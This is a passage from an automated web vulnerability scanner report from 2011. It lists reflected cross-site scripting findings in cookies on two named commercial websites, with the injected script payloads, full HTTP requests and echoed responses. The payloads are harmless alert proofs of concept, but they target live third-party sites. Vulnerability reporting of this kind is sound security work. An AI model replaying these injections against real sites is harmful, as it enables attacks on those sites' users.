<input type="hidden" name="UserType" value="http://www.mcafeesecure.com/us/forconsumers/mcaf73468"><script>alert(1)</script>2a7514ba6f" />
...[SNIP]...

1.44. http://www.surepayroll.com/product/payroll/payroll-services.asp [sMkeyword cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surepayroll.com
Path:   /product/payroll/payroll-services.asp

Issue detail

The value of the sMkeyword cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74603"><script>alert(1)</script>957e85b3011 was submitted in the sMkeyword cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product/payroll/payroll-services.asp HTTP/1.1
Host: www.surepayroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.surepayroll.com/product/payroll/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sMkeyword=74603"><script>alert(1)</script>957e85b3011; sMsource=http%3A%2F%2Fwww%2Emcafeesecure%2Ecom%2Fus%2Fforconsumers%2Fmcaf; ASPSESSIONIDCASQTBDQ=MJDOJOHAPFPLGMCLDOLAMMKC; __utmx=117341828.00016514002693917061:2:3; __utmxx=117341828.00016514002693917061:1317390646:2592000; ASPSESSIONIDQAADTATA=IFCAJOHAFKMKCHGKAAGGOGBJ; __utma=117341828.1933136298.1317390646.1317390646.1317390646.1; __utmc=117341828; __utmz=117341828.1317390646.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:23:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33258
Content-Type: text/html; Charset=ISO-LATIN-1
Expires: Fri, 30 Sep 2011 14:23:42 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">


...[SNIP]...
<input type="hidden" name="EmployeeType" value="74603"><script>alert(1)</script>957e85b3011" />
...[SNIP]...

1.45. http://www.surepayroll.com/product/payroll/payroll-services.asp [sMsource cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surepayroll.com
Path:   /product/payroll/payroll-services.asp

Issue detail

The value of the sMsource cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2287"><script>alert(1)</script>7e514b13d5d was submitted in the sMsource cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product/payroll/payroll-services.asp HTTP/1.1
Host: www.surepayroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.surepayroll.com/product/payroll/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sMkeyword=; sMsource=http%3A%2F%2Fwww%2Emcafeesecure%2Ecom%2Fus%2Fforconsumers%2Fmcafa2287"><script>alert(1)</script>7e514b13d5d; ASPSESSIONIDCASQTBDQ=MJDOJOHAPFPLGMCLDOLAMMKC; __utmx=117341828.00016514002693917061:2:3; __utmxx=117341828.00016514002693917061:1317390646:2592000; ASPSESSIONIDQAADTATA=IFCAJOHAFKMKCHGKAAGGOGBJ; __utma=117341828.1933136298.1317390646.1317390646.1317390646.1; __utmc=117341828; __utmz=117341828.1317390646.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:23:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33258
Content-Type: text/html; Charset=ISO-LATIN-1
Expires: Fri, 30 Sep 2011 14:23:43 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">


...[SNIP]...
<input type="hidden" name="UserType" value="http://www.mcafeesecure.com/us/forconsumers/mcafa2287"><script>alert(1)</script>7e514b13d5d" />
...[SNIP]...

1.46. http://www.wineenthusiast.com/glassware.asp [NCREmail cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wineenthusiast.com
Path:   /glassware.asp

Issue detail

The value of the NCREmail cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dccb"%3balert(1)//df4737eaa3 was submitted in the NCREmail cookie. This input was echoed as 4dccb";alert(1)//df4737eaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /glassware.asp?icid=HPGLASSWAREASPOT1 HTTP/1.1
Host: www.wineenthusiast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.wineenthusiast.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NCREmail=4dccb"%3balert(1)//df4737eaa3; weDefSrcCodeFtrCk=PH6FA11; S7Available=true; SessionStart=TRUE; tid=; WineEnthusiast1=exp=October%252030%252C%25202011%252009%253A50%253A08&uid=1FFA5CFB%2DEB18%2D4464%2D8241%2DB8341DD0881F; ASPSESSIONIDACBRRBSR=ABFBPAIDKDAOLMIIPLFFGJGO; __utma=159606498.2047564591.1317390612.1317390612.1317390612.1; __utmc=159606498; __utmz=159606498.1317390612.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __qca=P0-61425056-1317390618909; s_cc=true; IS2_Rules_6206=9188%600%60/templates/%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60%5E%5E%5E9203%600%60landing.asp%3FN%3D168%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60; IS2_MatchHistory=%20; mbcc=111DAB9B-A587-5575-92D4-CE44C816D484; CVT5kReIUID=edee92e6-dfbf-49f1-9101-53afbe51c7fb; cvo_sid1=SPZW6FZWEK8X; CVTSESSION=B75301826BC7121A27523C99980B222D; IS2_StoredValues=PrevOfferCount%600%2CPrevOfferTime%600%2CLastRuleIDTriggered%600%2CRuleTriggered%600%2CTimeSinceLastCheck%601910; s_sq=wineenthusiastcom%3D%2526pid%253DHome%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.wineenthusiast.com/glassware.asp%25253Ficid%25253DHPGLASSWAREASPOT1%2526ot%253DAREA

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:25:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 109323
Content-Type: text/html
Set-Cookie: LastCatNValViewed=353; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: LastCatViewed=GLASSWARE; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: weSource=ZSEOFA11; expires=Sun, 30-Oct-2011 14:25:56 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: SessionStart=TRUE; domain=www.wineenthusiast.com; path=/
Set-Cookie: URLState=http%3A%2F%2Fwww%2Ewineenthusiast%2Ecom%2FE%2Flanding%2Easp%3FN%3D353%26icid%3DHPGLASSWAREASPOT1; domain=www.wineenthusiast.com; path=/
Cache-control: private


<html>
<head>

<title>Wine Glasses: Crystal Glassware, Stemware & Wine Glass Sets - Wine Enthusiast</title>
<META name="description" content="Wine Glasses from Wine Enthusiast. Find exquisite
...[SNIP]...
<script type="text/javascript">
       var convert_first_name="";
       var convert_last_name="";
       var convert_email="4dccb";alert(1)//df4737eaa3";
   </script>
...[SNIP]...

1.47. http://www.wineenthusiast.com/glassware.asp [WineEnthusiast1 cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wineenthusiast.com
Path:   /glassware.asp

Issue detail

The value of the WineEnthusiast1 cookie is copied into an HTML comment. The payload 94330--><script>alert(1)</script>c78f6457a5e was submitted in the WineEnthusiast1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /glassware.asp?icid=HPGLASSWAREASPOT1 HTTP/1.1
Host: www.wineenthusiast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.wineenthusiast.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NCREmail=; weDefSrcCodeFtrCk=PH6FA11; S7Available=true; SessionStart=TRUE; tid=; WineEnthusiast1=exp=October%252030%252C%25202011%252009%253A50%253A08&uid=1FFA5CFB%2DEB18%2D4464%2D8241%2DB8341DD0881F94330--><script>alert(1)</script>c78f6457a5e; ASPSESSIONIDACBRRBSR=ABFBPAIDKDAOLMIIPLFFGJGO; __utma=159606498.2047564591.1317390612.1317390612.1317390612.1; __utmc=159606498; __utmz=159606498.1317390612.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __qca=P0-61425056-1317390618909; s_cc=true; IS2_Rules_6206=9188%600%60/templates/%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60%5E%5E%5E9203%600%60landing.asp%3FN%3D168%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60; IS2_MatchHistory=%20; mbcc=111DAB9B-A587-5575-92D4-CE44C816D484; CVT5kReIUID=edee92e6-dfbf-49f1-9101-53afbe51c7fb; cvo_sid1=SPZW6FZWEK8X; CVTSESSION=B75301826BC7121A27523C99980B222D; IS2_StoredValues=PrevOfferCount%600%2CPrevOfferTime%600%2CLastRuleIDTriggered%600%2CRuleTriggered%600%2CTimeSinceLastCheck%601910; s_sq=wineenthusiastcom%3D%2526pid%253DHome%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.wineenthusiast.com/glassware.asp%25253Ficid%25253DHPGLASSWAREASPOT1%2526ot%253DAREA

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:26:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 109340
Content-Type: text/html
Set-Cookie: LastCatNValViewed=353; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: LastCatViewed=GLASSWARE; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: weSource=ZSEOFA11; expires=Sun, 30-Oct-2011 14:26:04 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: SessionStart=TRUE; domain=www.wineenthusiast.com; path=/
Set-Cookie: URLState=http%3A%2F%2Fwww%2Ewineenthusiast%2Ecom%2FE%2Flanding%2Easp%3FN%3D353%26icid%3DHPGLASSWAREASPOT1; domain=www.wineenthusiast.com; path=/
Set-Cookie: NCREmail=; domain=www.wineenthusiast.com; path=/
Cache-control: private


<html>
<head>

<title>Wine Glasses: Crystal Glassware, Stemware & Wine Glass Sets - Wine Enthusiast</title>
<META name="description" content="Wine Glasses from Wine Enthusiast. Find exquisite
...[SNIP]...
<!-- uid = 1FFA5CFB-EB18-4464-8241-B8341DD0881F94330--><script>alert(1)</script>c78f6457a5e //-->
...[SNIP]...

Report generated by dork at Fri Sep 30 09:35:29 CDT 2011.